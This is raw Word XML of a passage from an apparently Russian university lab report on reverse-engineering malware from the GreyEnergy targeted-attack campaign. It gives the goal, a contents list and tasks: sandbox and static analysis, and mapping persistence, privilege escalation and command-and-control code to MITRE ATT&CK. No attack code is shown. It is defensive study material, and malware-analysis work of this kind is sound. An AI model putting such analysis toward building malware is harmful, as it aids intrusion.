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</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r w:rsidRPr="006A0481">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">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4FAE15D9" w:rsidR="00830F2D" w:rsidRPr="004A0930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A0930">
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>3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4C9B02B4" w:rsidR="00830F2D" w:rsidRPr="006A0481" w:rsidRDefault="004A0930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cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>Изучение сценариев целенаправленных атак и используемого в них программного обеспечения</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AAD01E7" w14:textId="3F156D5C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41577">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Технологии реверс-инжиниринга программного обеспечения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27959487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793619">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>5131001/305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FA387C5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641577">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Овасапян Т</w:t>
      </w:r>
      <w:r w:rsidR="00E97AE7">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00641577">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Д.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0273EA8A" w:rsidR="00467900" w:rsidRPr="009E1DD2" w:rsidRDefault="009E1DD2" w:rsidP="006E598D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</w:t>
      </w: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77777777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A179F">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>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63BC484A" w14:textId="002B0C77" w:rsidR="00F23163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14273113" w:history="1">
            <w:r w:rsidR="00F23163" w:rsidRPr="0011507B">
              <w:rPr>
                <w:rStyle w:val="aff3"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="00F23163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F23163" w:rsidRPr="0011507B">
              <w:rPr>
                <w:rStyle w:val="aff3"/>
              </w:rPr>
              <w:t>Цель работы</w:t>
            </w:r>
            <w:r w:rsidR="00F23163">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00F23163">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00F23163">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc214273113 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00F23163">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00F23163">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00F23163">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
            <w:r w:rsidR="00F23163">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="492E3A24" w14:textId="7959C72D" w:rsidR="00F23163" w:rsidRDefault="00F23163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4273114" w:history="1">
            <w:r w:rsidRPr="0011507B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11507B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_Toc214273114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794934" w14:textId="37D89564" w:rsidR="00F23163" w:rsidRDefault="00F23163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4273115" w:history="1">
            <w:r w:rsidRPr="0011507B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11507B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_Toc214273115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0FA065E" w14:textId="316203E0" w:rsidR="00F23163" w:rsidRDefault="00F23163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273116" w:history="1">
            <w:r w:rsidRPr="0011507B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1507B">
              <w:rPr>
                <w:rStyle w:val="aff3"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Исследование существующих публикаций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F9A6" w14:textId="45998DBF" w:rsidR="00F23163" w:rsidRDefault="00F23163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273117" w:history="1">
            <w:r w:rsidRPr="0011507B">
              <w:rPr>
                <w:rStyle w:val="aff3"/>
                <w:noProof/>
                <w:lang w:val="en-US"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1507B">
              <w:rPr>
                <w:rStyle w:val="aff3"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>GreyEnergyDropper.doc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234E" w14:textId="7C7F661E" w:rsidR="00F23163" w:rsidRDefault="00F23163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273118" w:history="1">
            <w:r w:rsidRPr="0011507B">
              <w:rPr>
                <w:rStyle w:val="aff3"/>
                <w:noProof/>
                <w:lang w:val="en-US"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1507B">
              <w:rPr>
                <w:rStyle w:val="aff3"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>GreyEnergymini.bin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500C" w14:textId="62899CB3" w:rsidR="00F23163" w:rsidRDefault="00F23163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273119" w:history="1">
            <w:r w:rsidRPr="0011507B">
              <w:rPr>
                <w:rStyle w:val="aff3"/>
                <w:noProof/>
                <w:lang w:val="en-US"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1507B">
              <w:rPr>
                <w:rStyle w:val="aff3"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>GreyEnergyDropper.bin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C34F" w14:textId="2DA45F0B" w:rsidR="00F23163" w:rsidRDefault="00F23163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273120" w:history="1">
            <w:r w:rsidRPr="0011507B">
              <w:rPr>
                <w:rStyle w:val="aff3"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>3.5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1507B">
              <w:rPr>
                <w:rStyle w:val="aff3"/>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve">Классификация </w:t>
            </w:r>
            <w:r w:rsidRPr="0011507B">
              <w:rPr>
                <w:rStyle w:val="aff3"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>MITRE</w:t>
            </w:r>
            <w:r w:rsidRPr="0011507B">
              <w:rPr>
                <w:rStyle w:val="aff3"/>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="0011507B">
              <w:rPr>
                <w:rStyle w:val="aff3"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>ATT</w:t>
            </w:r>
            <w:r w:rsidRPr="0011507B">
              <w:rPr>
                <w:rStyle w:val="aff3"/>
                <w:noProof/>
              </w:rPr>
              <w:t>&amp;</w:t>
            </w:r>
            <w:r w:rsidRPr="0011507B">
              <w:rPr>
                <w:rStyle w:val="aff3"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>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9D90" w14:textId="5A63066F" w:rsidR="00F23163" w:rsidRDefault="00F23163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4273121" w:history="1">
            <w:r w:rsidRPr="0011507B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11507B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_Toc214273121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6D1EC16B" w14:textId="1A3E5129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6649F2DC" w:rsidR="00812A5B" w:rsidRDefault="00812A5B" w:rsidP="00616951">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_Toc214273113"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Цель работы</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p w14:paraId="3DF6CA99" w14:textId="4BE29CDE" w:rsidR="004A0930" w:rsidRPr="004A0930" w:rsidRDefault="004A0930" w:rsidP="004A0930">
      <w:pPr>
        <w:ind w:firstLine="850"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Изучить</w:t>
      </w:r>
      <w:r w:rsidRPr="007773FC">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">сценарии известных </w:t>
      </w:r>
      <w:r w:rsidRPr="00B0616A">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">целенаправленных </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>атак (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>APT</w:t>
      </w:r>
      <w:r w:rsidRPr="004E209F">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r w:rsidRPr="004E209F">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>dvanced</w:t>
      </w:r>
      <w:r w:rsidRPr="004E209F">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="004E209F">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>persistent</w:t>
      </w:r>
      <w:r w:rsidRPr="004E209F">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="004E209F">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>threats</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">), рассмотреть способы их обнаружения и предотвращения. Изучить вредоносное программное обеспечение (ВПО), используемое в </w:t>
      </w:r>
      <w:r w:rsidRPr="00F63E82">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">целенаправленных </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>атаках.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2846EE86" w14:textId="4685CBBC" w:rsidR="004A0930" w:rsidRDefault="006A179F" w:rsidP="006E598D">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_Toc214273114"/>
      <w:r>
        <w:t>Задачи</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:p w14:paraId="510CA62B" w14:textId="13CE5C9A" w:rsidR="004A0930" w:rsidRPr="007613C8" w:rsidRDefault="004A0930" w:rsidP="004A0930">
      <w:pPr>
        <w:pStyle w:val="af3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="0" w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">В ходе выполнения лабораторной работы необходимо изучить не менее 3 </w:t>
      </w:r>
      <w:r w:rsidRPr="00777471">
        <w:t>исполняемых файлов</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00377B33">
        <w:t>(.</w:t>
      </w:r>
      <w:r w:rsidRPr="00377B33">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>exe</w:t>
      </w:r>
      <w:r w:rsidRPr="00377B33">
        <w:t>, .</w:t>
      </w:r>
      <w:r w:rsidRPr="00377B33">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>dll</w:t>
      </w:r>
      <w:r w:rsidRPr="00377B33">
        <w:t>, .</w:t>
      </w:r>
      <w:r w:rsidRPr="00377B33">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sys</w:t>
      </w:r>
      <w:r w:rsidRPr="00377B33">
        <w:t xml:space="preserve"> и т.п.)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, используемых в указанной </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>APT</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> компании</w:t>
      </w:r>
      <w:r w:rsidRPr="00164754">
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21D334A3" w14:textId="77777777" w:rsidR="004A0930" w:rsidRDefault="004A0930" w:rsidP="004A0930">
      <w:pPr>
        <w:pStyle w:val="af3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="0" w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Исследовать существующие публикации, описывающие указанную </w:t>
      </w:r>
      <w:r w:rsidRPr="00F63E82">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>целенаправленную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атаку и инструменты, используемые в ней. Представить в отчете описание рассматриваемых атак.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E970DD5" w14:textId="77777777" w:rsidR="004A0930" w:rsidRDefault="004A0930" w:rsidP="004A0930">
      <w:pPr>
        <w:pStyle w:val="af3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="0" w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Провести предварительный динамический анализ с использованием изолированных сред динамического анализа ВПО (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>malware</w:t>
      </w:r>
      <w:r w:rsidRPr="0001336C">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sandbox</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">), например, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Cuckoo</w:t>
      </w:r>
      <w:r w:rsidRPr="0001336C">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Sandbox</w:t>
      </w:r>
      <w:r w:rsidRPr="00842E8C">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> [2] </w:t>
      </w:r>
      <w:r w:rsidRPr="00415155">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00842E8C">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>CAPE</w:t>
      </w:r>
      <w:r w:rsidRPr="00415155">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00842E8C">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> [3]</w:t>
      </w:r>
      <w:r w:rsidRPr="00C94D33">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00743FAB">
        <w:t>DRAKVUF [4]</w:t>
      </w:r>
      <w:r w:rsidRPr="00743FAB">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> либо их аналогов в виде онлайн-сервисов</w:t>
      </w:r>
      <w:r w:rsidRPr="00842E8C">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> [</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA3A0F">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidRPr="00842E8C">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
      <w:r w:rsidRPr="0001336C">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> Получить начальную информацию о поведении и назначении исполняемых файлов.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43FA7C32" w14:textId="77777777" w:rsidR="004A0930" w:rsidRDefault="004A0930" w:rsidP="004A0930">
      <w:pPr>
        <w:pStyle w:val="af3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="0" w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Провести углубленный динамический и статический анализ полученных экземпляров ВПО с целью определения наиболее опасных функциональных возможностей в нем. </w:t>
      </w:r>
      <w:r w:rsidRPr="0080127C">
        <w:t xml:space="preserve">С помощью утилит мониторинга изменений в системе (например, SysTracer, </w:t>
      </w:r>
      <w:r w:rsidRPr="0080127C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Total</w:t>
      </w:r>
      <w:r w:rsidRPr="0080127C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0080127C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Uninstall</w:t>
      </w:r>
      <w:r w:rsidRPr="0080127C">
        <w:t xml:space="preserve">, Sandboxie, </w:t>
      </w:r>
      <w:r w:rsidRPr="0080127C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>RegShot</w:t>
      </w:r>
      <w:r w:rsidRPr="0080127C">
        <w:t>) отследить изменения в системе после запуска исследуемых файлов (драйверы, службы, реестр, файлы).</w:t>
      </w:r>
      <w:r w:rsidRPr="0080127C">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0080127C">
        <w:t xml:space="preserve">Используя утилиты </w:t>
      </w:r>
      <w:r w:rsidRPr="0080127C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ProcessMonitor</w:t>
      </w:r>
      <w:r w:rsidRPr="0080127C">
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:r w:rsidRPr="0080127C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>WinAPIOverride</w:t>
      </w:r>
      <w:r w:rsidRPr="0080127C">
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="0080127C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>WinAPI</w:t>
      </w:r>
      <w:r w:rsidRPr="0080127C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0080127C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Monitor</w:t>
      </w:r>
      <w:r w:rsidRPr="0080127C">
        <w:t xml:space="preserve"> отследить действия, выполняемые исследуемым ПО. Используя утилиту ProcessHacker изучить создаваемые ВПО процессы и их ресурсы (загруженные библиотеки, открытые файлы, объекты синхронизации, сетевые порты). Для определения назначения исполняемых файлов и их алгоритм</w:t>
      </w:r>
      <w:r>
        <w:t>ов</w:t>
      </w:r>
      <w:r w:rsidRPr="0080127C">
        <w:t xml:space="preserve"> работы стоит использовать дизассемблеры</w:t>
      </w:r>
      <w:r w:rsidRPr="00377B33">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0080127C">
        <w:t>(IDA Pro</w:t>
      </w:r>
      <w:r w:rsidRPr="00377B33">
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Ghidra</w:t>
      </w:r>
      <w:r w:rsidRPr="00377B33">
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="0080127C">
        <w:t xml:space="preserve"> и отладчики</w:t>
      </w:r>
      <w:r w:rsidRPr="00377B33">
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>x</w:t>
      </w:r>
      <w:r w:rsidRPr="00377B33">
        <w:t>64</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>dbg</w:t>
      </w:r>
      <w:r w:rsidRPr="00377B33">
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="0080127C">
        <w:t>Immunity Debugger</w:t>
      </w:r>
      <w:r w:rsidRPr="00377B33">
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="0080127C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>WinDBG</w:t>
      </w:r>
      <w:r w:rsidRPr="0080127C">
        <w:t xml:space="preserve">) и WinAPI-мониторы (WinAPIOverride, </w:t>
      </w:r>
      <w:r w:rsidRPr="0080127C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>WinAPI</w:t>
      </w:r>
      <w:r w:rsidRPr="0080127C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0080127C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Monitor</w:t>
      </w:r>
      <w:r w:rsidRPr="0080127C">
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B7B5F81" w14:textId="77777777" w:rsidR="004A0930" w:rsidRDefault="004A0930" w:rsidP="004A0930">
      <w:pPr>
        <w:pStyle w:val="af3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="0" w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Описать принцип работы исследованных компонентов.  Определить и изучить код, связанный с осуществлением следующих действий, соответствующих классификации </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>MITRE</w:t>
      </w:r>
      <w:r w:rsidRPr="003B55D2">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ATT</w:t>
      </w:r>
      <w:r w:rsidRPr="003B55D2">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>&amp;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>CK</w:t>
      </w:r>
      <w:r w:rsidRPr="00426241">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> [</w:t>
      </w:r>
      <w:r w:rsidRPr="00743FAB">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidRPr="009C1AB5">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="470BD3CB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закрепление в системе (добавление в автозагрузку, заражение существующих файлов, установка своих компонентов, установка служб);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BC8FD5F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повышение привилегий (эксплуатация уязвимостей, запуск специальных инструментов);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58ACEB32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сбор информации о системе (пользователи, установленное ПО, недавно используемые программы и файлы и т.д.);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CC7B427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поиск средств защиты в системе (анализ процессов, файлов</w:t>
      </w:r>
      <w:r w:rsidRPr="006C5A8E">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>директорий, реестра);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="145737F4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сетевая активность (сбор информации об устройстве сети, сетевые атаки);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="710A41D0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реализация сетевых атак (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>MITM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="318BAEEA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эксплуатация уязвимостей (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>CVE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>, описание уязвимости);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56C225A4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связь с управляющим (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidRPr="006C5A8E">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>&amp;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>)</w:t>
      </w:r>
      <w:r w:rsidRPr="006C5A8E">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>сервером</w:t>
      </w:r>
      <w:r w:rsidRPr="006C5A8E">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">получение </w:t>
      </w:r>
      <w:r w:rsidRPr="006C5A8E">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">/ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>отправка информации</w:t>
      </w:r>
      <w:r w:rsidRPr="006C5A8E">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="712AEE39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поиск целевой информации в системе (название и содержание файлов);</w:t>
      </w:r>
    </w:p>
